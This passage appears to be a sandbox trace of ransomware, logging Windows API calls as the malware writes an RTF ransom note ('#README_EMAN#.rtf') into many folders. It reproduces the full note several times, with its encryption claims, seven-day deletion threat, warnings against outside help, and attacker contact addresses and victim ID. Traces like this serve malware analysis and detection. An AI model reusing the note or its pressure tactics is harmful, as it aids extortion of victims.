\\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.399] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0271.399] WriteFile (in: hFile=0x2ec, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.400] CloseHandle (hObject=0x2ec) returned 1 [0271.400] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\#readme_eman#.rtf")) returned 0x20 [0271.400] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\regid.1991-06.com.microsoft\\#readme_eman#.rtf")) returned 0x20 [0271.400] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\USOShared\\Logs\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\usoshared\\logs\\#readme_eman#.rtf")) returned 0x20 [0271.400] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\#readme_eman#.rtf")) returned 0x20 [0271.400] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\#readme_eman#.rtf")) returned 0xffffffff [0271.400] GetLastError () returned 0x2 [0271.400] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\cache\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0271.405] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 